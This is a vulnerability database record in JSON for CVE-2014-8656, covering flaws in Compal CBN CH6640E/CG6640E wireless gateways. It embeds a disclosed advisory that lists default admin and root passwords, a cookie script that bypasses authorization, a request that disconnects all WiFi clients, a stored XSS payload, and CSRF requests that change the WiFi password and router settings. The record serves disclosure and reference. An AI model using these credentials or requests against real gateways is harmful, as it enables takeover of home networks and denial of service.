document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "70762"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 0.4
},
"cve": "CVE-2014-8656",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8656",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-76601",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8656",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-8656",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76601",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities\n2. A denial-of-service vulnerability\n3. An HTML-injection vulnerability\n4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. 
\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET 
http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8656"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76601",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8656",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.6
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113836",
"trust": 1.8
},
{
"db": "BID",
"id": "70762",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76601",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"id": "VAR-201411-0179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.428000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2014-11-06T15:55:10.913000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-12-03T00:56:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities in certain firmware that gain access to certain critical information",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
}
}
VAR-201411-0180
Vulnerability from variot - Updated: 2025-04-13 23:14
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to bypass authorization and access sensitive information, and to perform cross-site scripting, cross-site request forgery, and denial of service attacks. 1. Multiple information-disclosure vulnerabilities 2. A denial-of-service vulnerability 3. An HTML-injection vulnerability 4. Other attacks are also possible.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Setting the userData cookie to root or admin reveals additional pages and information; the gateway accepts this client-supplied value in place of authentication.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
